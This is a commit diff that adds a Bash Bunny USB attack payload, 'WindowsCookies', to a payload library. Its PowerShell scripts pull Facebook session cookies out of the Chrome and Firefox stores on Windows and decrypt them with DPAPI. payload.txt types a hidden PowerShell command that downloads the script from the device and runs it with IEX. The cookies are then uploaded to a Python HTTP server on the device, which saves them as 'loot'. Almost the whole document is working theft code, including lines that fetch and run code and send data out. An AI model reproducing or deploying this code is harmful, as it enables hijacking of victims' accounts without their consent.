Cleanup: Sort payloads by category

payloads/library/credentials/WindowsCookies/README.md

@@ -0,0 +1,21 @@
+# WindowsCookies for Bash Bunnys
+
+Author: oXis    
+Version: Version 2.1    
+Credit: illwill, sekirkity, EmpireProject     
+
+## Description
+
+Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession    
+Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex)    
+Only payload.txt, server.py and p are required.    
+Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it.    
+
+## Payload LED STATUS
+
+| LED              | Status                                 |
+| ---------------- | -------------------------------------- |
+| Blue (blinking)  | Payload init                           |
+| Yellow (blinking)| Setup RNDIS_ETHERNET  				    |
+| Green (blinking) | Done               				    |
+

payloads/library/credentials/WindowsCookies/get_facebook_cookies.ps1

@@ -0,0 +1,124 @@
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds-Firefox() {
+	Param(
+		[String]$Path
+	)
+
+	if ([String]::IsNullOrEmpty($Path)) {
+        # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+		$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+	}
+
+	if (![system.io.file]::Exists($Path))
+	{
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Break
+	}
+
+	Add-Type -AssemblyName System.Security
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$BinaryText = $StreamReader.ReadToEnd()
+	$StreamReader.Close()
+	$Stream.Close()
+
+	# First the magic bytes for the facebook string, datr size is 24
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $datr = $PwdMatches.groups[1]
+
+	# First the magic bytes for the facebook string, c_user size is 15
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $c_user = $PwdMatches.groups[1]
+
+	# First the magic bytes for the facebook string, xs size is 44
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $xs = $PwdMatches.groups[1]
+
+	"Firefox ---> "
+	"datr is $datr ###"
+	"c_user is $c_user ###"
+	"xs is $xs ###"
+}
+
+function Get-FacebookCreds-Chrome() {
+	Param(
+		[String]$Path
+	)
+
+	if ([String]::IsNullOrEmpty($Path)) {
+        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+	}
+
+	if (![system.io.file]::Exists($Path))
+	{
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Break
+	}
+
+	Add-Type -AssemblyName System.Security
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$BinaryText = $StreamReader.ReadToEnd()
+	$StreamReader.Close()
+	$Stream.Close()
+
+	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+	"Chrome ---> "
+	"datr is $datr ###"
+	"c_user is $c_user ###"
+	"xs is $xs ###"
+}
+
+
+function Payload() {
+
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
+
+}

payloads/library/credentials/WindowsCookies/p

@@ -0,0 +1,124 @@
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds-Firefox() {
+	Param(
+		[String]$Path
+	)
+
+	if ([String]::IsNullOrEmpty($Path)) {
+        # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+		$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+	}
+
+	if (![system.io.file]::Exists($Path))
+	{
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Break
+	}
+
+	Add-Type -AssemblyName System.Security
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$BinaryText = $StreamReader.ReadToEnd()
+	$StreamReader.Close()
+	$Stream.Close()
+
+	# First the magic bytes for the facebook string, datr size is 24
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $datr = $PwdMatches.groups[1]
+
+	# First the magic bytes for the facebook string, c_user size is 15
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $c_user = $PwdMatches.groups[1]
+
+	# First the magic bytes for the facebook string, xs size is 44
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+	# $xs = $PwdMatches.groups[1]
+
+	"Firefox ---> "
+	"datr is $datr ###"
+	"c_user is $c_user ###"
+	"xs is $xs ###"
+}
+
+function Get-FacebookCreds-Chrome() {
+	Param(
+		[String]$Path
+	)
+
+	if ([String]::IsNullOrEmpty($Path)) {
+        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+	}
+
+	if (![system.io.file]::Exists($Path))
+	{
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Break
+	}
+
+	Add-Type -AssemblyName System.Security
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$BinaryText = $StreamReader.ReadToEnd()
+	$StreamReader.Close()
+	$Stream.Close()
+
+	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+	"Chrome ---> "
+	"datr is $datr ###"
+	"c_user is $c_user ###"
+	"xs is $xs ###"
+}
+
+
+function Payload() {
+
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
+
+}

payloads/library/credentials/WindowsCookies/payload.txt

@@ -0,0 +1,34 @@
+#!/bin/bash
+#
+# Title:         Facebook session cookies dump
+# Author:        oXis (inspired by illwill)
+# Version:       2.1
+#
+# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
+# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
+# Credit to illwill for the BrowerCreds payload
+#
+# LED States 
+# Setup.............Setup
+# Yellow............Setup RNDIS_ETHERNET
+# Green.............Got Browser Creds
+
+LED SETUP
+LOOTDIR=/root/udisk/loot/FacebookSession
+mkdir -p $LOOTDIR
+
+ATTACKMODE HID
+LED STAGE1
+GET SWITCH_POSITION
+cd /root/udisk/payloads/$SWITCH_POSITION/
+# server.py can now instant bind sockets 
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+./server.py &
+
+#Dump Chrome Cookies
+RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"
+
+LED STAGE2
+ATTACKMODE RNDIS_ETHERNET
+
+LED FINISH 

payloads/library/credentials/WindowsCookies/server.py

@@ -0,0 +1,30 @@
+#!/usr/bin/python
+from os import curdir
+from os.path import join as pjoin
+
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+class StoreHandler(BaseHTTPRequestHandler):
+    store_path = "/root/udisk/loot/FacebookSession"
+    get_path = pjoin(curdir, 'p')
+
+    def do_GET(self):
+        if self.path == '/p':
+            with open(self.get_path) as fh:
+                self.send_response(200)
+                self.send_header('Content-type', 'text/plain')
+                self.end_headers()
+                self.wfile.write(fh.read().encode())
+
+    def do_POST(self):
+        length = self.headers['content-length']
+        data = self.rfile.read(int(length))
+
+        with open(self.store_path + self.path, 'a') as fh:
+            fh.write(data.decode() + "\n")
+
+        self.send_response(200)
+
+
+server = HTTPServer(('', 8080), StoreHandler)
+server.serve_forever()